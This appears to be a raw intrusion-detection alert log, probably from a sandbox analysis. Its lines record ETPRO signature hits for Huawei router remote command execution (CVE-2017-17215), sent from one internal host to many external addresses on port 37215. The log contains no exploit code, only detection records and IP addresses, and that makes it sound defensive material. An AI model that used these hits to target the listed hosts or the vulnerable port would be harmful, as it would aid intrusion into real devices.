                                                    07/10/24-08:27:31.465521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6084437215192.168.2.14197.26.31.23
                                                    07/10/24-08:26:36.433814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3764837215192.168.2.1441.139.23.248
                                                    07/10/24-08:26:38.545437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3861637215192.168.2.14197.188.73.112
                                                    07/10/24-08:27:13.803034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3591837215192.168.2.14113.231.99.31
                                                    07/10/24-08:26:15.843639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5716837215192.168.2.14157.184.148.251
                                                    07/10/24-08:26:29.868554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3648237215192.168.2.14157.60.192.39
                                                    07/10/24-08:27:22.909155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5907237215192.168.2.14114.164.247.127
                                                    07/10/24-08:26:15.877145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4656237215192.168.2.14172.143.43.102
                                                    07/10/24-08:26:51.997172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5070237215192.168.2.14197.181.47.131
                                                    07/10/24-08:27:13.970962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5166037215192.168.2.14157.163.246.42
                                                    07/10/24-08:26:31.105929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4285637215192.168.2.14197.89.230.237
                                                    07/10/24-08:27:31.468333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4034037215192.168.2.14157.3.90.69
                                                    07/10/24-08:27:31.565038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3505637215192.168.2.14197.178.223.202
                                                    07/10/24-08:27:08.426882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3984637215192.168.2.14197.194.6.0
                                                    07/10/24-08:26:42.374952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4163437215192.168.2.14157.130.188.143
                                                    07/10/24-08:27:03.014226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3977637215192.168.2.14157.178.248.87
                                                    07/10/24-08:27:16.994273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3483837215192.168.2.1441.145.128.91
                                                    07/10/24-08:26:43.923272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4036237215192.168.2.1441.190.199.200
                                                    07/10/24-08:27:24.981965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4694437215192.168.2.1441.91.234.254
                                                    07/10/24-08:27:14.834024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4659237215192.168.2.14157.191.196.227
                                                    07/10/24-08:27:19.182366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3789637215192.168.2.1441.57.78.59
                                                    07/10/24-08:26:15.861470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5498437215192.168.2.14157.200.37.58
                                                    07/10/24-08:26:28.855166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5994637215192.168.2.14157.219.50.211
                                                    07/10/24-08:26:14.804179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3470637215192.168.2.14193.81.110.172
                                                    07/10/24-08:27:07.290610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5303037215192.168.2.1491.12.74.198
                                                    07/10/24-08:27:14.831646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5164837215192.168.2.14197.42.87.16
                                                    07/10/24-08:26:20.150804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4091437215192.168.2.14174.55.72.179
                                                    07/10/24-08:26:36.330025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4571837215192.168.2.14197.20.107.40
                                                    07/10/24-08:27:11.532484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3398437215192.168.2.14197.250.109.90
                                                    07/10/24-08:27:17.000608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5725237215192.168.2.1431.14.196.215
                                                    07/10/24-08:26:59.870602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257437215192.168.2.14157.62.221.6
                                                    07/10/24-08:26:20.175593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414837215192.168.2.14197.79.121.48
                                                    07/10/24-08:26:29.857933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4860037215192.168.2.14216.116.218.169
                                                    07/10/24-08:27:13.800580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5379637215192.168.2.14197.7.247.62
                                                    07/10/24-08:26:42.388281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4680837215192.168.2.14197.62.37.124
                                                    07/10/24-08:27:10.558738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3852437215192.168.2.14197.111.104.7
                                                    07/10/24-08:27:07.281440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3445837215192.168.2.1446.152.236.244
                                                    07/10/24-08:27:17.099903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5216237215192.168.2.14197.21.247.139
                                                    07/10/24-08:26:28.649292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5310037215192.168.2.1441.132.202.220
                                                    07/10/24-08:26:45.645798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5468437215192.168.2.1478.115.74.128
                                                    07/10/24-08:26:14.813637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574237215192.168.2.1441.152.215.8
                                                    07/10/24-08:26:33.165723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5719437215192.168.2.14197.170.213.203
                                                    07/10/24-08:26:33.243765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3669637215192.168.2.14157.213.65.237
                                                    07/10/24-08:26:36.427022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4999437215192.168.2.1473.201.210.147
                                                    07/10/24-08:26:26.437394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4745837215192.168.2.14106.134.171.11
                                                    07/10/24-08:26:26.615804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5307837215192.168.2.14197.248.148.96
                                                    07/10/24-08:27:02.865689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5481037215192.168.2.14157.222.208.206
                                                    07/10/24-08:26:57.623346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5999037215192.168.2.14217.39.31.231
                                                    07/10/24-08:27:32.584145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3364237215192.168.2.14198.193.61.193
                                                    07/10/24-08:26:13.644987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4144837215192.168.2.1417.35.241.140
                                                    07/10/24-08:26:43.873718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5569037215192.168.2.14197.198.126.41
                                                    07/10/24-08:26:42.164122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4495837215192.168.2.1441.212.236.101
                                                    07/10/24-08:27:13.974355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574837215192.168.2.14197.217.218.192
                                                    07/10/24-08:26:43.927826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5348237215192.168.2.14211.209.44.62
                                                    07/10/24-08:27:20.451550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3598637215192.168.2.14197.235.102.243
                                                    07/10/24-08:27:33.857818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639037215192.168.2.14208.153.244.70
                                                    07/10/24-08:27:13.868751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5057037215192.168.2.14197.159.169.231
                                                    07/10/24-08:27:14.831646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4572837215192.168.2.1478.192.108.39
                                                    07/10/24-08:26:11.578460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5304437215192.168.2.1441.70.152.5
                                                    07/10/24-08:26:33.240752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4308037215192.168.2.14117.238.125.161
                                                    07/10/24-08:27:19.273517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3695837215192.168.2.14197.194.93.247
                                                    07/10/24-08:27:32.594360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5520637215192.168.2.14197.72.89.236
                                                    07/10/24-08:26:55.308630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5104437215192.168.2.14157.180.231.133
                                                    07/10/24-08:26:13.761894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6099837215192.168.2.1441.64.116.206
                                                    07/10/24-08:27:24.962924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4497237215192.168.2.14197.167.71.34
                                                    07/10/24-08:26:45.648834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4891637215192.168.2.14130.101.65.127
                                                    07/10/24-08:26:22.278406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4877637215192.168.2.14157.43.136.101
                                                    07/10/24-08:26:25.525014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4827637215192.168.2.1469.239.92.79
                                                    07/10/24-08:26:25.488855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4238037215192.168.2.14197.224.222.113
                                                    07/10/24-08:27:02.694487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5984837215192.168.2.1441.237.139.15
                                                    07/10/24-08:26:28.906271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4262837215192.168.2.14182.29.71.246
                                                    07/10/24-08:27:32.590326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3885237215192.168.2.14197.227.154.155
                                                    07/10/24-08:27:33.833957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3953437215192.168.2.14197.180.50.218
                                                    07/10/24-08:26:36.392573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4240037215192.168.2.14157.240.244.137
                                                    07/10/24-08:26:36.427022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5415637215192.168.2.1441.165.34.40
                                                    07/10/24-08:26:38.647269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3814237215192.168.2.14157.69.135.122
                                                    07/10/24-08:26:38.611968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239037215192.168.2.1441.90.203.149
                                                    07/10/24-08:26:20.137377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3285837215192.168.2.14197.203.144.87
                                                    07/10/24-08:27:05.167666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3918437215192.168.2.144.109.59.121
                                                    07/10/24-08:27:30.486969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4854037215192.168.2.14197.21.14.109
                                                    07/10/24-08:26:45.603395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5181637215192.168.2.14157.157.246.107
                                                    07/10/24-08:26:55.412388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4420437215192.168.2.14157.53.200.85
                                                    07/10/24-08:26:25.464984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4000237215192.168.2.14197.212.175.122
                                                    07/10/24-08:27:05.164173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3916237215192.168.2.1439.86.211.24
                                                    07/10/24-08:27:20.509281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4051637215192.168.2.14157.16.215.1
                                                    07/10/24-08:26:45.636858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3840837215192.168.2.14197.72.150.132
                                                    07/10/24-08:26:31.063898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3895037215192.168.2.1418.195.228.41
                                                    07/10/24-08:26:57.630985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5870837215192.168.2.14157.156.82.170
                                                    07/10/24-08:26:59.785283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4464237215192.168.2.14197.20.43.118
                                                    07/10/24-08:27:23.938620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5517037215192.168.2.14197.81.11.83
                                                    07/10/24-08:26:41.467844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5281637215192.168.2.14157.81.81.36
                                                    07/10/24-08:26:59.877507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4276437215192.168.2.1441.101.191.101
                                                    07/10/24-08:27:02.997295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4037837215192.168.2.14203.161.21.234
                                                    07/10/24-08:26:29.888154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3349037215192.168.2.14157.78.177.120
                                                    07/10/24-08:27:22.910234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3901237215192.168.2.14157.183.90.227
                                                    07/10/24-08:26:18.020441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4005637215192.168.2.14161.87.230.231
                                                    07/10/24-08:26:59.814735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4628837215192.168.2.1447.28.233.133
                                                    07/10/24-08:27:17.073080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5825837215192.168.2.14197.83.171.111
                                                    07/10/24-08:27:10.535959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4483237215192.168.2.14157.138.160.205
                                                    07/10/24-08:27:20.460856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3381237215192.168.2.1441.219.117.148
                                                    07/10/24-08:26:59.558711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3288237215192.168.2.14206.29.39.141
                                                    07/10/24-08:27:13.728066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4364637215192.168.2.1441.167.160.119
                                                    07/10/24-08:26:33.189218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5447237215192.168.2.14197.216.172.3
                                                    07/10/24-08:26:11.576586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3696437215192.168.2.14197.230.47.191
                                                    07/10/24-08:26:29.837168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5067037215192.168.2.1441.63.240.16
                                                    07/10/24-08:26:55.322377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5790437215192.168.2.14197.13.67.124
                                                    07/10/24-08:26:36.437126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4857237215192.168.2.14197.200.197.130
                                                    07/10/24-08:26:48.027883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3354637215192.168.2.1441.76.126.47
                                                    07/10/24-08:26:47.948537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4702837215192.168.2.14157.6.172.63
                                                    07/10/24-08:26:49.850871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3805837215192.168.2.1441.159.81.5
                                                    07/10/24-08:27:23.956739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4109037215192.168.2.14157.84.164.212
                                                    07/10/24-08:27:02.878785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4501637215192.168.2.1447.139.163.240
                                                    07/10/24-08:26:15.800332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4814637215192.168.2.14197.217.114.94
                                                    07/10/24-08:26:20.147730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5328237215192.168.2.14157.195.194.215
                                                    07/10/24-08:26:20.171305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5578437215192.168.2.1441.39.217.114
                                                    07/10/24-08:27:27.159132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3315637215192.168.2.14157.78.199.151
                                                    07/10/24-08:27:33.811617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5871837215192.168.2.14197.230.217.156
                                                    07/10/24-08:26:14.795320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4542837215192.168.2.14197.19.208.246
                                                    07/10/24-08:26:20.104603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5124837215192.168.2.1441.90.12.44
                                                    07/10/24-08:26:11.661383TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5627637215192.168.2.14197.239.231.22
                                                    07/10/24-08:26:23.355050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567037215192.168.2.1441.58.91.209
                                                    07/10/24-08:26:43.788473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4596837215192.168.2.14162.141.128.235
                                                    07/10/24-08:26:14.804457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5473437215192.168.2.14197.97.197.90
                                                    07/10/24-08:27:32.569542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5990237215192.168.2.14157.191.3.31
                                                    07/10/24-08:27:05.146522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4686037215192.168.2.14197.200.251.172
                                                    07/10/24-08:27:32.567631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4919837215192.168.2.1441.80.164.29
                                                    07/10/24-08:26:14.626418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566237215192.168.2.1441.253.214.217
                                                    07/10/24-08:27:22.799639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5702437215192.168.2.141.240.159.153
                                                    07/10/24-08:26:29.794117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5858837215192.168.2.14197.207.227.75
                                                    07/10/24-08:27:28.156575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5160437215192.168.2.14197.107.92.74
                                                    07/10/24-08:26:29.848557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3645437215192.168.2.14157.75.249.209
                                                    07/10/24-08:27:14.861604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5160037215192.168.2.14157.77.110.157
                                                    07/10/24-08:27:22.476492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5709637215192.168.2.14157.184.234.239
                                                    07/10/24-08:26:55.386841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5620637215192.168.2.14197.162.183.152
                                                    07/10/24-08:27:22.562470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239037215192.168.2.14157.232.152.143
                                                    07/10/24-08:27:31.453868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5602637215192.168.2.1489.78.62.120
                                                    07/10/24-08:26:38.585781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5683037215192.168.2.14223.249.95.21
                                                    07/10/24-08:27:33.839511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3744037215192.168.2.14210.116.158.72
                                                    07/10/24-08:26:55.322726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3955237215192.168.2.14197.186.2.42
                                                    07/10/24-08:27:22.573004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5228637215192.168.2.1441.222.111.145
                                                    07/10/24-08:26:25.525580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4489437215192.168.2.14157.236.131.200
                                                    07/10/24-08:26:59.691821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4040837215192.168.2.1441.226.179.127
                                                    07/10/24-08:27:05.121816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6091837215192.168.2.1427.62.19.197
                                                    07/10/24-08:27:05.178122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641837215192.168.2.14157.232.6.29
                                                    07/10/24-08:26:38.543702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3278637215192.168.2.14197.131.91.106
                                                    07/10/24-08:27:14.846444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4319237215192.168.2.14197.147.157.111
                                                    07/10/24-08:27:20.488786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4647637215192.168.2.14197.193.104.160
                                                    07/10/24-08:26:41.524750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5250037215192.168.2.14157.233.223.214
                                                    07/10/24-08:27:14.844780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5308037215192.168.2.14157.35.157.93
                                                    07/10/24-08:27:19.349991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6052037215192.168.2.14157.15.254.254
                                                    07/10/24-08:27:24.932186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4770237215192.168.2.14197.118.15.58
                                                    07/10/24-08:26:55.322019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4429237215192.168.2.14157.40.148.235
                                                    07/10/24-08:26:59.589952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3940637215192.168.2.14114.218.213.10
                                                    07/10/24-08:27:32.622738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4037637215192.168.2.1441.18.101.0
                                                    07/10/24-08:26:36.404948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5348837215192.168.2.1447.152.54.157
                                                    07/10/24-08:27:22.439779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5413637215192.168.2.14197.197.201.26
                                                    07/10/24-08:26:11.512950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5308837215192.168.2.14197.254.13.134
                                                    07/10/24-08:27:02.879957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4515637215192.168.2.1441.102.115.145
                                                    07/10/24-08:27:24.976996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4421637215192.168.2.1485.144.33.115
                                                    07/10/24-08:27:28.139662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4877637215192.168.2.14197.187.144.112
                                                    07/10/24-08:26:59.602276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5791837215192.168.2.14197.153.30.209
                                                    07/10/24-08:26:49.865409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3474037215192.168.2.1414.151.177.35
                                                    07/10/24-08:27:07.361334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5189837215192.168.2.1441.58.209.45
                                                    07/10/24-08:26:11.583126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3393237215192.168.2.14157.176.51.125
                                                    07/10/24-08:27:07.316362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3584837215192.168.2.14121.173.249.144
                                                    07/10/24-08:27:27.146425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5116237215192.168.2.14146.209.79.32
                                                    07/10/24-08:27:10.723777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5692037215192.168.2.14197.36.21.54
                                                    07/10/24-08:26:41.445058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4810037215192.168.2.14157.245.225.72
                                                    07/10/24-08:26:28.650487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3896637215192.168.2.1481.34.42.42
                                                    07/10/24-08:26:45.689039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4085837215192.168.2.14197.189.50.127
                                                    07/10/24-08:26:28.929842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4977237215192.168.2.1441.136.34.247
                                                    07/10/24-08:27:13.761850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5432837215192.168.2.14157.28.10.110
                                                    07/10/24-08:26:22.295536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5988637215192.168.2.14157.192.74.50
                                                    07/10/24-08:26:57.536379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3474037215192.168.2.14157.86.9.19
                                                    07/10/24-08:27:14.846444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4201037215192.168.2.14197.241.178.137
                                                    07/10/24-08:26:57.645172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5948437215192.168.2.1441.201.127.19
                                                    07/10/24-08:26:43.925849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4040037215192.168.2.14173.18.132.53
                                                    07/10/24-08:26:51.966611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4216037215192.168.2.1441.27.189.166
                                                    07/10/24-08:26:43.861312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4162037215192.168.2.14157.180.30.239
                                                    07/10/24-08:26:33.214564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5956837215192.168.2.14197.123.183.181
                                                    07/10/24-08:26:11.614311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3358837215192.168.2.14157.254.254.39
                                                    07/10/24-08:26:18.023692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3440437215192.168.2.14157.208.20.27
                                                    07/10/24-08:26:53.172944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4793037215192.168.2.14197.118.156.190
                                                    07/10/24-08:26:22.298145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5503237215192.168.2.14197.54.165.237
                                                    07/10/24-08:26:59.652707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4256837215192.168.2.1441.8.38.69
                                                    07/10/24-08:27:13.999285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6073037215192.168.2.1441.207.53.225
